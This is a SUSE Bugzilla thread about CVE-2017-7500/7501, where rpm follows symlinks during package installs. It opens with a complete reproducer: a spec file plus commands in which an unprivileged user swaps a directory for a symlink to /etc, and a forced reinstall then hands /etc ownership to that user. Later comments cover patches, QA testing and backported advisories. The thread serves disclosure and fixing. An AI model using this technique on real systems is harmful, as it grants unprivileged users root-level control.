Bugzilla – Bug 943457
VUL-1: CVE-2017-7500 CVE-2017-7501: rpm: user owned subdirectories in rpm packages can lead user to root escalation
Last modified: 2023-06-21 03:19:23 UTC
rpm follows symlinks to directories when installling packages. Ie if a package contains /usr/share/foo/bar and /usr/share/foo is a symlink to /etc, rpm would install bar into /etc. Moreover, rpm also applies all attributes to the directory the symlink is pointing at. That becomes a problem if a package contains subdirectories in directories owned by an unprivileged user. That unprivileged user can then replace the subdirectory with a symlink to a root owned directory. On next package upgrade rpm would follow the symlink, change the ownership of the linked directory and install files there. Consider the following example: $ cd ~/rpmbuild/SPECS $ cat perm.spec Name: perm Version: 1 Release: 0 Group: Development/Tools/Building Summary: Lorem ipsum License: GPL-2.0+ BuildRoot: %_tmppath/%name-%version-build Url: http://www.opensuse.org/ BuildArch: noarch %description Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquid ex ea commodi consequat. Quis aute iure reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint obcaecat cupiditat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. %prep %build %install install -d -m 755 %buildroot/usr/share/foo/bar echo test > %buildroot/usr/share/foo/bar/baz %files %defattr(0755,wwwrun,root) %dir /usr/share/foo %dir /usr/share/foo/bar /usr/share/foo/bar/baz %changelog $ rpmbuild -bb perm.spec ... $ sudo rpm -U ~/rpmbuild/RPMS/noarch/perm-1-0.noarch.rpm $ l /usr/share/foo/ insgesamt 0 drwxr-xr-x 1 wwwrun root 6 27. Aug 14:34 ./ drwxr-xr-x 1 root root 6132 27. Aug 14:34 ../ drwxr-xr-x 1 wwwrun root 6 27. Aug 14:34 bar/ $ sudo -u wwwrun rm -r /usr/share/foo/bar $ sudo -u wwwrun ln -s /etc /usr/share/foo/bar $ l /usr/share/foo/bar lrwxrwxrwx 1 wwwrun www 4 27. Aug 14:35 /usr/share/foo/bar -> /etc/ $ l -d /etc/ drwxr-xr-x 1 root root 6010 27. Aug 14:21 /etc// $ sudo rpm -U ~/rpmbuild/RPMS/noarch/perm-1-0.noarch.rpm --force $ l -d /etc/ drwxr-xr-x 1 wwwrun root 6016 27. Aug 14:35 /etc// $ l /etc/baz -rwxr-xr-x 1 wwwrun root 5 27. Aug 14:34 /etc/baz*
Nope.
#18: if you read that comment in the Fedora bugzilla you'll notice that they asked me in irc about it.
Adding Florian Festi <ffesti@redhat.com> to cc Paraphrases summary from SUSE internal discussion: "This may be a problem known for a long time unfixable without breaking other valid use cases." "A fix would be a hard change in behavior, needs to be acked by upstream. Many changes required to make it that race-free, user could modify directory contents while an rpm gets installed." "Possibly previously discussed in the context of chkstat."
So another year passed and we are still vulnerable with packagers adding more vulnerable packages.
found another new package submission to factory to fall into the trap. can this be made public now?
(This issue is public now.)
also CVE-2017-7501
Created attachment 731961 [details] CVE-2017-7500.patch CVE-2017-7500.patch for the directory traversal exploit part
https://bugzilla.redhat.com/show_bug.cgi?id=1452133 CVE-2017-7501 rpm: Following symlinks to files when installing packages allows privilege escalation https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-7500 CVE-2017-7500 rpm: Following symlinks to directories when installing packages allows privilege escalation
Created attachment 731962 [details] CVE-2017-7501-1.patch CVE-2017-7501-1.patch 1/3 patches for file override
Created attachment 731963 [details] CVE-2017-7501-2.patch CVE-2017-7501-2.patch
Created attachment 731964 [details] CVE-2017-7501-3.patch CVE-2017-7501-3.patch
Using the maintenance update SUSE:Maintenance:7433:165047, I am still getting the same results for before and after for this bug. Please see the section for bug #943457 in the report here: http://qam.suse.de/testreports/SUSE:Maintenance:7433:165047/log I get the exact same results as comment #0 before and after. For me since this bug is VUL-1 means that the update needs rejecting.
That's because you're creating the symlink as user root. rpm treats this as indication that it is ok to follow the symlink. Note also that I didn't use the attached patches, but instead went with what rpm upstream committed. (BTW, just curious, who created that testcase?)
(In reply to Michael Schröder from comment #35) > That's because you're creating the symlink as user root. rpm treats this as > indication that it is ok to follow the symlink. > > Note also that I didn't use the attached patches, but instead went with what > rpm upstream committed. > > (BTW, just curious, who created that testcase?) So I tried again with the symlink created by the user (instead of wwwrun I used testsuser) and the file is still created. The permissions are still changed. From what I see it makes no difference. Can you please take a look at the report again at the same section? Maybe I did again something wrong? I guess Ludwig Nussel created the testcase? If you have another happy to try it as well but I think this is ok, it shows the issue :)
Please let me know if there is something I'm doing wrong, I need some help on this because I'm blocked. Is the reproducer not correct for the patches that you used? Can you give me a "better" one? More suited to show the bug? Setting needinfo because the more this bug is not reproduced, the more the update will take to go out.
Hmm. Seems like the upstream fix is incomplete or wrong. I'm afraid I need to discuss this with the rpm people. (I have some idea on how to fix it but I don't know if this will break anything else.)
SUSE-SU-2018:2073-1: An update that solves one vulnerability and has two fixes is now available. Category: security (moderate) Bug References: 1094735,1095148,943457 CVE References: CVE-2017-7500 Sources used: SUSE Linux Enterprise Module for Development Tools 15 (src): rpm-4.14.1-10.3.1 SUSE Linux Enterprise Module for Basesystem 15 (src): python-rpm-4.14.1-10.3.1, rpm-4.14.1-10.3.1
openSUSE-SU-2018:2215-1: An update that solves one vulnerability and has two fixes is now available. Category: security (moderate) Bug References: 1094735,1095148,943457 CVE References: CVE-2017-7500 Sources used: openSUSE Leap 15.0 (src): python-rpm-4.14.1-lp150.9.3.1, rpm-4.14.1-lp150.9.3.1
Quick question: When will this fix be backported to SLES12SP2/SP3 ?
Any time you like to release it. The patch is already finished, I just need to commit it and submit the update.
Thanks Michael ! Pls. do so for SLES11 SP4 / SLES12 SP2 & SP3, as my customer is awaiting it (Bundesagentur für Arbeit is somehow a bit more aligned to CERT/Fixes due to their natural alignment)
@Michael: Any news here ... customer was just asking about an update !
The update is submitted to maintenance (SR#172484). It now needs to go through QA, which might take some time.
SUSE-SU-2018:3286-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 1077692,943457 CVE References: CVE-2017-7500,CVE-2017-7501 Sources used: SUSE Linux Enterprise Software Development Kit 12-SP3 (src): rpm-4.11.2-16.16.1 SUSE Linux Enterprise Server 12-SP3 (src): python3-rpm-4.11.2-16.16.1, rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1 SUSE Linux Enterprise Desktop 12-SP3 (src): rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1 SUSE CaaS Platform ALL (src): rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1 SUSE CaaS Platform 3.0 (src): rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1 OpenStack Cloud Magnum Orchestration 7 (src): rpm-4.11.2-16.16.1, rpm-python-4.11.2-16.16.1
openSUSE-SU-2018:3373-1: An update that fixes two vulnerabilities is now available. Category: security (moderate) Bug References: 1077692,943457 CVE References: CVE-2017-7500,CVE-2017-7501 Sources used: openSUSE Leap 42.3 (src): python3-rpm-4.11.2-14.10.1, rpm-4.11.2-14.10.1, rpm-python-4.11.2-14.10.1
@Michael: SLES12SP2 (LTSS) is still missing ... can we release this, too ?
Dunno. Should we?
(There's nothing to submit from my side for this.)
SUSE-SU-2018:3884-1: An update that fixes two vulnerabilities is now available. Category: security (important) Bug References: 943457 CVE References: CVE-2017-7500,CVE-2017-7501 Sources used: SUSE OpenStack Cloud 7 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Software Development Kit 12-SP4 (src): rpm-4.11.2-16.21.1 SUSE Linux Enterprise Software Development Kit 12-SP3 (src): rpm-4.11.2-16.21.1 SUSE Linux Enterprise Server for SAP 12-SP2 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Server 12-SP4 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Server 12-SP3 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Server 12-SP2-LTSS (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Server 12-SP2-BCL (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Server 12-SP1-LTSS (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Server 12-LTSS (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Desktop 12-SP4 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Linux Enterprise Desktop 12-SP3 (src): rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE Enterprise Storage 4 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE CaaS Platform ALL (src): rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 SUSE CaaS Platform 3.0 (src): rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 OpenStack Cloud Magnum Orchestration 7 (src): rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1
SUSE-SU-2018:3884-2: An update that fixes two vulnerabilities is now available. Category: security (important) Bug References: 943457 CVE References: CVE-2017-7500,CVE-2017-7501 Sources used: SUSE Linux Enterprise Server for SAP 12-SP1 (src): python3-rpm-4.11.2-16.21.1, rpm-4.11.2-16.21.1, rpm-python-4.11.2-16.21.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
We need this fix for SLES11 SP3 (LTSS). There is a L3 bug with a customer requesting this fix as well. Is it possible? Thanks!
Bah, that's rpm-4.4.2.3. That'll be a lot for work for a VUL-1 classified bug. Why do they request it?
(In reply to Michael Schröder from comment #58) > Bah, that's rpm-4.4.2.3. That'll be a lot for work for a VUL-1 classified > bug. Why do they request it? The customer is requesting because they are using SLES11 SP3 LTSS. Thus, they want the security fix. ;-) https://bugzilla.suse.com/show_bug.cgi?id=1135195
That wasn't my point. My point was that this is a very minor security problem (thus the VUL-1, i.e. "fix with the next update").
(In reply to Michael Schröder from comment #60) > That wasn't my point. My point was that this is a very minor security > problem (thus the VUL-1, i.e. "fix with the next update"). Do we have a fix for SLES 11 SP3 in progress? I can see only for SLES 12 and SLES 15. I don't think the customer is willing to upgrade to SLES 12, they have a good support time to SLES 11 SP 3 yet.
Well, as L3 said they would do the backport I'm currently not working on it.
Hello guys, I'm trying to make sure that CVE-2017-7501 is fixed in SLE 15SP2. It is marked as not affected in SMASH, also in the RH bugzilla and RPM changelog it is marked as fixed in version 4.14.0. But looking at the actual commit it narrowly didn't make it into rpm 4.14.0 https://github.com/rpm-software-management/rpm/commit/404ef011c300207cdb1e531670384564aae04bdc so it also didn't make it into our package in SP2, and there isn't a separate patch (like there is one for CVE-2017-7500). It seems to me that may be we are still affected. Am I missing something?
(SLE-15-SP2 comes with with 4.14.1) I think it is included. There are just a couple of commits on top of it: https://github.com/rpm-software-management/rpm/commit/2979d4ef5579e2bb3295ed0c97e322bebe5f0f46 https://github.com/rpm-software-management/rpm/commit/cd3b20574b4d75b973bfa9e6cdb15b6289ab27e3
Thanks, Michael! That clears all my doubts.(In reply to Michael Schröder from comment #64) > (SLE-15-SP2 comes with with 4.14.1) > > I think it is included. There are just a couple of commits on top of it: > > https://github.com/rpm-software-management/rpm/commit/ > 2979d4ef5579e2bb3295ed0c97e322bebe5f0f46 > https://github.com/rpm-software-management/rpm/commit/ > cd3b20574b4d75b973bfa9e6cdb15b6289ab27e3 Thanks Michael! That clears all my doubts.